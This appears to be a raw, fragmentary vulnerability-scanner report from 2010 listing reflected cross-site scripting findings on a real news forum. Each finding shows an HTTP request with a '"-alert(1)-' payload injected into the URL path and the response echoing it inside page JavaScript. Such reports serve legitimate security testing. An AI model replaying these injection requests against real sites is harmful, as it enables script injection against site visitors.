HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:59 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22216 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... language="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / poll266bd"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=get ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /poll/are-medical |
GET /poll/are-medical Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20220 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... =""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / poll/are-medical s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /poll/are-medical |
GET /poll/are-medical Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:54 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28628 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / poll/are-medical s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /syndication/jsonXml |
GET /syndication72dff"-alert(1)- Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:43:42 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:44:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22109 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... e="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / syndication72dff"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /syndication/jsonXml |
GET /syndication/jsonXml Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:49:50 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:50:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22134 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... f (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / syndication/jsonXmlToHtml s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/40th-annivesary |
GET /topicab22e"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:08 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22276 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicab22e"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/40th-annivesary |
GET /topic/40th-annivesary Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22276 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... rop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/40th-annivesary s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/40th-annivesary |
GET /topic/40th-annivesary Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:50 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22243 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... op1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/40th-annivesary s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/645-sri-lanka-and |
GET /topice42c8"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:18 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22160 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topice42c8"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.e ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/645-sri-lanka-and |
GET /topic/645-sri-lanka-and Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:28 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22160 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... = 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/645-sri-lanka-and s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/645-sri-lanka-and |
GET /topic/645-sri-lanka-and Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:06 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46103 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/645-sri-lanka-and s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/about-gold-price |
GET /topicb094c"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicb094c"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/about-gold-price |
GET /topic/about-gold-price Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... f s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/about-gold-price s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/about-gold-price |
GET /topic/about-gold-price Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 95450 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/about-gold-price s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/al-qaida-is-us |
GET /topic6ef8c"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22132 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic6ef8c"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageNam ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/al-qaida-is-us |
GET /topic/al-qaida-is-us Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22132 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/al-qaida-is-us s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/al-qaida-is-us |
GET /topic/al-qaida-is-us Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 98974 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... f (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/al-qaida-is-us s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/bp-oil-spill-was |
GET /topicd738f"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:12 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicd738f"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/bp-oil-spill-was |
GET /topic/bp-oil-spill-was Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:21 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ned') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/bp-oil-spill-was s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/bp-oil-spill-was |
GET /topic/bp-oil-spill-was Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32485 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ed') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/bp-oil-spill-was s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/ferret-theory-lv |
